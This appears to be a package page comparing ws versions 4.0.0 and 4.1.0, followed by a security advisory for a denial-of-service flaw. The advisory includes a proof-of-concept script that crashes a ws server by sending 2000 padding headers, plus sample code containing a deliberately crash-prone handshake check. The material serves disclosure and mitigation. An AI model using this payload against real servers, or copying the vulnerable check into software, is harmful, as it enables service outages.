ws versions 4.1.0 and 4.0.0 are both robust WebSocket client and server libraries for Node.js, emphasizing speed and ease of use. Comparing the two reveals subtle yet important distinctions for developers. Version 4.1.0, released in February 2018, is slightly newer than version 4.0.0, released in January 2018, and represents incremental improvements. A notable difference lies in the dependencies: version 4.0.0 relies on the "ultron" package, while version 4.1.0 removes this dependency. Both versions share "safe-buffer" and "async-limiter" as dependencies.
Looking at development dependencies, both versions use tools such as nyc, eslint, benchmark, bufferutil, and utf-8-validate. However, there are version differences in mocha, eslint, eslint-plugin-node, eslint-plugin-import, and eslint-config-standard, indicating updates to the testing and linting environments to accommodate the latest standards with security fixes. Developers upgrading to 4.1.0 should note the change in dependencies, which could affect existing code that relied on ultron's functionality. The updated development dependencies likely reflect improvements in code quality, maintainability, and adherence to evolving coding conventions. Both versions are licensed under MIT, ensuring flexibility in usage. The author and repository information remain consistent, linking back to the websockets/ws GitHub repository.
All vulnerabilities affecting version 4.1.0 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');

// Start a ws server on an ephemeral port; the callback runs once it is listening.
const wss = new WebSocket.Server({ port: 0 }, function () {
  // Build 2000 distinct two-character header names (2000 is Node's default
  // server.maxHeadersCount); short names keep the request under Node's
  // default --max-http-header-size so the count limit is what gets hit.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // The handshake headers come last, so they fall beyond the count limit
  // and are dropped from req.headers by Node's HTTP parser.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e).
In vulnerable versions of ws, the issue can be mitigated in the following ways:
Limit the total size of request headers with the --max-http-header-size=size Node.js command-line option and/or the maxHeaderSize server option so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
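The failure mode behind this advisory, as an added example that is not ws's own code: Node keeps only the first server.maxHeadersCount headers on req.headers and drops the rest, so a handshake check that dereferences req.headers.upgrade without confirming it exists throws inside the 'upgrade' handler. The functions below simulate that header truncation offline (buildHeaders, constructedRequest and the two check functions are my own, modelled on the problem described above, not ws internals) and contrast the crashing check with a hardened one that also covers the "set server.maxHeadersCount to 0" mitigation via a limit of 0.

```javascript
// Node keeps at most server.maxHeadersCount (default 2000) headers on req.headers
// and drops the rest, but still emits 'upgrade' for a parsed upgrade request.
const MAX_HEADERS_COUNT = 2000;
// Simulate req.headers as Node builds it: names lower-cased, only the first
// `limit` headers kept; limit 0 means no limit (server.maxHeadersCount = 0).
function buildHeaders(rawHeaders, limit = MAX_HEADERS_COUNT) {
  const headers = {};
  let count = 0;
  for (const [name, value] of Object.entries(rawHeaders)) {
    if (limit > 0 && count++ >= limit) break;
    headers[name.toLowerCase()] = value;
  }
  return headers;
}
// Vulnerable shape of the check: assumes the Upgrade header is always present,
// so a dropped header becomes a TypeError thrown inside the 'upgrade' handler.
function vulnerableUpgradeCheck(headers) {
  return headers.upgrade.toLowerCase() === 'websocket';
}
// Hardened check: verify each handshake header exists before using it and
// return a rejection decision (HTTP 400) instead of throwing.
function hardenedUpgradeCheck(headers) {
  const upgrade = headers.upgrade;
  if (upgrade === undefined || upgrade.toLowerCase() !== 'websocket') {
    return { ok: false, status: 400, reason: 'Invalid Upgrade header' };
  }
  const key = headers['sec-websocket-key'];
  if (key === undefined || !/^[+/0-9A-Za-z]{22}==$/.test(key)) {
    return { ok: false, status: 400, reason: 'Invalid Sec-WebSocket-Key header' };
  }
  if (headers['sec-websocket-version'] !== '13') {
    return { ok: false, status: 400, reason: 'Invalid Sec-WebSocket-Version header' };
  }
  return { ok: true, status: 101, reason: 'ok' };
}
// Constructed sample request (not a real capture): padding headers first,
// handshake headers last, the ordering that pushes them past the count limit.
function constructedRequest(paddingCount) {
  const raw = {};
  for (let i = 0; i < paddingCount; i++) raw[`x-pad-${i}`] = 'x';
  return Object.assign(raw, { Connection: 'Upgrade', Upgrade: 'websocket',
    'Sec-WebSocket-Key': 'dGhlIHNhbXBsZSBub25jZQ==', 'Sec-WebSocket-Version': '13' });
}
// Run the vulnerable check and report a crash as a value rather than propagating it.
function vulnerableOutcome(headers) {
  try { return vulnerableUpgradeCheck(headers) ? 'accepted' : 'rejected'; }
  catch (e) { return `crash: ${e.constructor.name}`; }
}
```

With the default limit the padded request loses its Upgrade header and the vulnerable check throws, while the hardened check answers 400; with a limit of 0 all headers survive and the handshake is accepted.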